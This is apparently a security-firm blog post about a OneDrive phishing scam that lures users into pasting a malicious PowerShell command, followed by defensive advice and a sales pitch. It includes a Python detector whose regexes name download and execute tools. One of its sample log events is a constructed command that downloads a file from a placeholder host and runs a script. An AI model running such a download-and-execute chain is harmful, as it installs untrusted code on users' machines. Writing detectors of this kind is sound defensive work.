Cybersecurity experts have discovered a new phishing scam targeting Microsoft OneDrive users. This scam uses tricky social engineering tactics to get users to run a harmful PowerShell script on their computers.

How the Scam Works

  1. The Email: The scam starts with an email that contains an HTML file.
  2. Fake OneDrive Page: When you open the file, it shows a fake OneDrive page with an error message saying, "Failed to connect to the 'OneDrive' cloud service. To fix the error, you need to update the DNS cache manually."
  3. Two Options: The message offers two options: "How to fix" and "Details."
    • "Details" leads to a legitimate Microsoft page on DNS troubleshooting.
    • "How to fix" asks you to press "Windows Key + X" to open a menu, then launch PowerShell, and paste a command to fix the issue.
  4. Malicious Command: This command flushes the DNS cache, creates a folder on your C: drive, downloads a file, and runs a harmful script.

Who Is Targeted?

This scam has been found targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K. It shows that phishing attacks are becoming more common and more sophisticated.

How This Scam Is Different

  • Complex Instructions: This scam uses detailed instructions to trick users into running a harmful script, unlike simpler phishing attacks that just ask for your login information.
  • Trusted Platforms: It uses legitimate-looking pages and trusted platforms like Microsoft OneDrive to fool users.

Protecting Your Business

  1. Educate Your Team: Train employees to recognize phishing emails and suspicious links. Emphasize the importance of verifying requests for sensitive actions.
  2. Implement Email Filtering: Use advanced email filtering solutions to detect and block phishing attempts before they reach your inbox.
  3. Regular Updates and Patches: Ensure that all software, including email clients and browsers, is up to date to protect against known vulnerabilities.
  4. Multi-Factor Authentication (MFA): Implement MFA to add an extra layer of security, making it harder for attackers to access accounts even if they manage to steal credentials.
  5. Regular Backups: Regularly back up important data to minimize damage in case of an attack.
  6. Monitor Systems: Use security monitoring tools to detect unusual activities and potential threats early.
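
An added example (not from the original article or from any vendor tool) of the monitoring in item 6, applied to the command chain in step 4 of "How the Scam Works": it flags PowerShell script block log text (Event ID 4104) that combines a DNS flush with a download and an execution step. The regex patterns, the record fields and the sample events are assumptions constructed for illustration, since the article does not quote the command itself.

```python
import re

# Behaviours named in step 4 of the article. The patterns are assumptions:
# common PowerShell ways to do each step, not the actual command.
BEHAVIOURS = {
    "flush_dns": re.compile(r"ipconfig(\.exe)?\s+/flushdns|Clear-DnsClientCache", re.I),
    "create_folder": re.compile(r"(New-Item|\bmkdir\b|\bmd\b)[^;|]*\bC:\\", re.I),
    "download": re.compile(
        r"Invoke-WebRequest|\b(iwr|curl|wget)\b|DownloadFile|Start-BitsTransfer", re.I),
    "execute": re.compile(
        r"Invoke-Expression|\biex\b|Start-Process|&\s*['\"]?C:\\[^;|]+\.(ps1|exe|bat|cmd)",
        re.I),
}

def assess(script_text):
    """Report which of the four behaviours appear in one logged script block."""
    hits = [name for name, rx in BEHAVIOURS.items() if rx.search(script_text)]
    # A DNS flush alone is routine troubleshooting. The chain in the article
    # pairs it with a download and an execution step in one pasted command.
    suspicious = all(step in hits for step in ("flush_dns", "download", "execute"))
    return {"hits": hits, "suspicious": suspicious}

def triage(events):
    """Return the hosts whose logged script block shows the full chain."""
    return [e["host"] for e in events if assess(e["text"])["suspicious"]]

# Constructed records (hypothetical hosts and paths), not from a real incident.
SAMPLE_EVENTS = [
    {"host": "ws-014", "text": r"ipconfig /flushdns"},
    {"host": "ws-022",
     "text": r"Invoke-WebRequest https://example.invalid/report.csv -OutFile C:\temp\report.csv"},
    {"host": "ws-031",
     "text": r"ipconfig /flushdns; New-Item -ItemType Directory -Path C:\example; "
             r"Invoke-WebRequest https://example.invalid/f.zip -OutFile C:\example\f.zip; "
             r"& C:\example\run.ps1"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["host"], assess(event["text"]))
    print("escalate:", triage(SAMPLE_EVENTS))
```

Script block logging must be enabled for pasted interactive commands to reach the log; treat a match as a lead for review, not a verdict.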

Conclusion

The OneDrive phishing scam highlights the need for vigilance and proactive cybersecurity measures. By staying informed and implementing robust security practices, you can protect your business from evolving phishing threats.

Don’t wait until it’s too late. Click here or call 201-730-2468 to schedule your Free Cyber Risk Assessment with Arcee Tech today! We will evaluate your current security posture, identify vulnerabilities, and provide actionable insights to safeguard your organization against cyber attacks.

Contact us now to secure your assessment and strengthen your defenses!